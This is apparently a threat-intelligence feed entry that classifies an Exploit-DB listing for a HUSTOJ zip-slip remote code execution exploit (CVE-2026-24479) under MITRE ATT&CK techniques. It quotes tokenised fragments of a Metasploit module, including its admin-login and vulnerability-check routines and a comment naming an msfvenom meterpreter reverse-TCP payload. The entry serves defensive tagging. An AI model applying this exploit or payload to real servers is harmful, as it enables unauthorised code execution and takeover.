TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Exploit-DB

[webapps] HUSTOJ Zip-Slip v26.01.24 - RCE

6 days ago

ATT&CK techniques detected

7 predictions
T1190 Exploit Public-Facing Application
96%
“arch ' = > [ arch _ x86 ], ' references ' = > [ [ ' url ', ' https : / / github. com / oxagast / oxasploits / blob / joshuajohnward / exploits ' \ ' / cve - 2026 - 24479 / hustoj _ problem _ import _ rce. rb ' ], [ ' url ', ' https : / / github. com / zhblue / hustoj / commit / 9…”
T1190 Exploit Public-Facing Application
88%
“. new ( ' handler ', [ true, ' start an exploit / multi / handler job to receive the connection ', true ] ) ] ) deregister _ options ( ' vhost ', ' proxies ', ' rhosts ', ' ssl ' ) end # check if the target is likely vulnerable def check res = send _ request _ cgi ( ' uri ' = > '…”
T1190 Exploit Public-Facing Application
88%
“configured for : # msfvenom - p linux / x86 / meterpreter _ reverse _ tcp - - format elf # # patch : # $ file _ name = $ path. zip _ entry _ name ( $ dir _ resource ) ; # $ file _ name = str _ replace ( '.. / ', ' ', $ file _ name ) ; # $ file _ path = substr ( $ file _ name, 0, …”
T1190 Exploit Public-Facing Application
75%
“problem import rce ( cve - 2026 - 24479 ) class metasploit3 < msf : : exploit : : remote rank = excellentranking include msf : : exploit : : remote : : httpclient prepend msf : : exploit : : remote : : autocheck def initialize ( info = { } ) super ( update _ info ( info, ' name '…”
T1539 Steal Web Session Cookie
48%
“' ) exploit : : checkcode : : safe end # authenticate as admin and return session cookies def login ( user, pass ) res = send _ request _ cgi ( { ' uri ' = > ' / ', ' method ' = > ' get ', ' keep _ cookies ' = > true, ' ctype ' = > ' text / html ' }, 3 ) if res & & res. code = = …”
T1190 Exploit Public-Facing Application
40%
“[ webapps ] hustoj zip - slip v26. 01. 24 - rce hustoj zip - slip v26. 01. 24 - rce # exploit title : hustoj zip - slip v26. 01. 24 - rce # date : 2026 - 02 - 14 # exploit author : marshall whittaker / oxagast # vendor homepage : https : / / github. com / zhblue / hustoj # softwa…”
T1190 Exploit Public-Facing Application
31%
“' ) exploit : : checkcode : : safe end # authenticate as admin and return session cookies def login ( user, pass ) res = send _ request _ cgi ( { ' uri ' = > ' / ', ' method ' = > ' get ', ' keep _ cookies ' = > true, ' ctype ' = > ' text / html ' }, 3 ) if res & & res. code = = …”

Summary

HUSTOJ Zip-Slip v26.01.24 - RCE